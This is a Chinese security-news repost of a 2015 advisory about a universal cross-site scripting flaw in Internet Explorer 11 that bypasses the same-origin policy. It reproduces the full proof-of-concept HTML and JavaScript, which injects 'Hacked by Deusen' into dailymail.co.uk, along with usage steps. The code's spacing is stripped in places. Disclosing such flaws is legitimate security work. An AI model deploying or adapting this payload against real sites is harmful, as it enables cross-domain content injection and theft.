未加星标

IE浏览器爆出可绕过同源策略的UXSS漏洞

字体大小 | |
[业界资讯 所属分类 业界资讯 | 发布者 店小二03 | 时间 | 作者 红领巾 ] 0人收藏点击收藏
IE浏览器爆出可绕过同源策略的UXSS漏洞 2015-02-03 11:52:56作者:360安全播报
IE浏览器爆出可绕过同源策略的UXSS漏洞

近日有国外安全研究者发现了IE浏览器的UXSS漏洞,利用该漏洞可以绕过浏览器的同源策略,窃取任意域名的内容、将恶意代码注入任意域名。目前该漏洞受影响的版本为IE11浏览器,我们在IE6、IE8上没有复现成功。

漏洞测试地址

http://www.deusen.co.uk/items/insider3show.3362009741042107/

概述

通过此IE漏洞可以修改其他域名的内容,测试的链接会修改dailymail.co.uk域名的内容为Hacked by Deusen。

测试方式

1. 确认弹窗弹出后,等待3秒后关闭。

2. 点击“Go”。

3. 7秒后,dailymail.co.uk的内容将被修改为“Hacked by Deusen”

利用效果图


IE浏览器爆出可绕过同源策略的UXSS漏洞

测试源代码(保存为html)

<title>insider3show</title> <bodystyle="font-family:Georgia;"> <h1>insider3show</h1> <iframestyle="display:none;"width=300height=300id=iname=isrc="1.php"></iframe><br> <iframewidth=300height=100frameBorder=0src="http://www.dailymail.co.uk/robots.txt"></iframe><br> <script> functiongo() { w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Closethiswindowafter3seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1); } setTimeout("go()",1000); </script> <b>Summary</b><br> AnInternetExplorervulnerabilityisshownhere:<br> Contentofdailymail.co.ukcanbechangedbyexternaldomain.<br> <br> <b>HowToUse</b><br> 1.Closethepopupwindow("confirm"dialog)afterthreeseconds.<br> 2.Click"Go".<br> 3.After7seconds,"HackedbyDeusen"isactivelyinjectedintodailymail.co.uk.<br> <br> <b>Screenshot</b><br> <ahref="screenshot.png">screenshot.png</a><br> <br> <b>TechnicalDetails</b><br> Vulnerability:UniversalCrossSiteScripting(XSS)<br> Impact:SameOriginPolicy(SOP)iscompletelybypassed<br> Attack:Attackerscanstealanythingfromanotherdomain,andinjectanythingintoanotherdomain<br> Tested:Jan/29/2015InternetExplorer11windows7<br> <br> <h1><ahref="http://www.deusen.co.uk/">www.deusen.co.uk</a></h1><scripttype="text/javascript"> //<![CDATA[ try{if(!window.CloudFlare){varCloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok3v=1613a3a185/"},atok:"6e87366c9054a61c3c7f1d71c9cfb464",petok:"0fad4629f14e9e2e51da3427556c8e191894b109-1422897396-1800",zone:"deusen.co.uk",rocket:"0",apps:{}}];CloudFlare.push({"apps":{"ape":"9e0d475915b2fa34aea396c09e17a7eb"}});!function(a,b){a=document.createElement("script"),b=document.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=919620257c/cloudflare.min.js",b.parentNode.insertBefore(a,b)}()}}catch(e){}; //]]> </script>

参考

http://packetstormsecurity.com/files/130208/insider3show-bypass.txt

http://www.deusen.co.uk/items/insider3show.3362009741042107/

本文由 360安全播报 原创发布,如需转载请注明来源及本文地址。
本文地址:http://bobao.360.cn/news/detail/1195.html

本文业界资讯相关术语:网络安全论文 网络安全密钥 网络安全工程师 网络安全技术与应用 网络安全概念股 网络安全知识 网络安全宣传周 网络安全知识竞赛 网络安全事件

主题: 浏览器360HTMLWindows恶意代码SOP
tags: gt,lt,br,co,uk,2C,http,script,deusen,insider3show,漏洞,h1,dailymail
分页:12
转载请注明
本文标题:IE浏览器爆出可绕过同源策略的UXSS漏洞
本站链接:http://www.codesec.net/view/413400.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 业界资讯 | 评论(0) | 阅读(300)